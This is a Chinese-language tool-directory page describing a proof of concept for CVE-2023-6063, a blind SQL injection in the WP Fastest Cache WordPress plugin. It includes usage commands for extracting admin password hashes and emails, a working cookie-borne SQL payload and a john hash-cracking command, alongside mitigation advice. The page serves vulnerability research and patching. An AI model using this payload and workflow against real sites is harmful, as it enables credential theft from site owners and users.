Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-6063-PoC — 针对CVE-2023-6063的概念验证,这是一个存在于WP Fastest Cache ≤1.2.2中的基于时间的盲SQL注入漏洞。 | Kitploit
工具/GitHubGitHub/incommatose/cve-2023-6063-poc
密码破解漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

针对CVE-2023-6063的概念验证,这是一个存在于WP Fastest Cache ≤1.2.2中的基于时间的盲SQL注入漏洞。

查看仓库
21391年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-6063 的 PoC:WP Fastest Cache 1.2.2 未经身份验证的盲 SQL 注入

Static Badge Static Badge Static Badge

这是 CVE-2023-6063 的概念验证,这是一个存在于 WP Fastest Cache ≤1.2.2 中的基于时间的盲 SQL 注入漏洞。通过滥用 wordpress_logged_in cookie,从 wp_users 表中提取哈希密码(user_pass)和电子邮件(user_email)。

功能特点

  • 基于时间的数据泄露(逐字符)通过 SLEEP() 延迟。
  • 支持自定义 cookie、目标用户名和哈希验证。

此脚本提取:

  • ☑️ WordPress 密码哈希(MD5/PHPass)。
  • ☑️ 关联的电子邮件地址。
  • 用于灵活测试的 CLI 参数(--just-hash, --just-email, --debug)。

用法

安装依赖(如果尚未安装):

root@kitploit:~
pip install -r requirements.txt

基本用法:

root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

完整选项:

root@kitploit:~
  -h, --help            显示此帮助信息并退出
  -u URL, --url URL     用于测试 CVE-2023-6063 的 WordPress 完整 URL
  --username USERNAME   定义要提取哈希密码的用户
  -d DELAY, --delay DELAY
                        等待 Web 响应的时间,默认 5,最小 2
  -H HASH, --hash HASH  用于与 wp_users 表验证的哈希,如果哈希包含特殊字符,请使用单引号 -> '<hash>'
  --domain DOMAIN       用于电子邮件验证的域名
  -c COOKIE, --cookie COOKIE
                        如果上下文中 cookie 名称不同,请指定
  --status-code STATUS_CODE
                        使用特定的成功状态码,默认 200
  --debug               更详细的输出
  --just-hash           仅提取哈希密码
  --just-email          仅提取用户的电子邮件值

💻 演示

这是针对 admin 用户的演示

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

当哈希密码泄露时,如果密码较弱,可使用 john 或 hashcat 配合 PHPass 算法解密。

John 示例:

root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ 技术细节

📖 漏洞描述

WordPress 的 WP Fastest Cache 插件(≤1.2.2)存在一个未经身份验证的盲 SQL 注入漏洞,通过 wordpress_logged_in cookie 利用。攻击者可利用此漏洞通过 SQL 查询中的基于时间的延迟(SLEEP())从 wp_users 表中提取敏感数据(例如密码哈希、电子邮件地址)。

root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 免责声明:仅在获得适当授权的情况下将此信息用于道德安全测试。未经授权的利用是非法的。

  • CVE ID:CVE-2023-6063
  • 漏洞评分:7.5(高危)
  • 漏洞类型:SQL 注入(盲注,基于时间)
  • 受影响软件:WP Fastest Cache(WordPress 插件)≤ v1.2.2

🔍 攻击向量

  • 可利用性:远程(无需身份验证)
  • 攻击复杂度:低(可通过精心构造的 HTTP 请求利用)

🔥 影响:

  • 机密性:高(泄露管理员凭据)
  • 完整性:无
  • 可用性:无

📌 受影响版本

  • WP Fastest Cache 版本 ≤1.2.2

🛡️ 缓解措施

将 WP Fastest Cache 升级到版本 >1.2.2。

  • 升级到 WP Fastest Cache v1.2.3 或更高版本。
  • 应用 WAF 规则以阻止 cookie 中的 SQL 注入载荷。
  • 如果未使用,请禁用该插件。

📚 参考

  • NIST NVD 条目
  • WordPress 插件公告
  • CVE 详情

⚖️ 法律声明

  • 此脚本仅供教育目的。测试前务必获得明确许可。
下载工具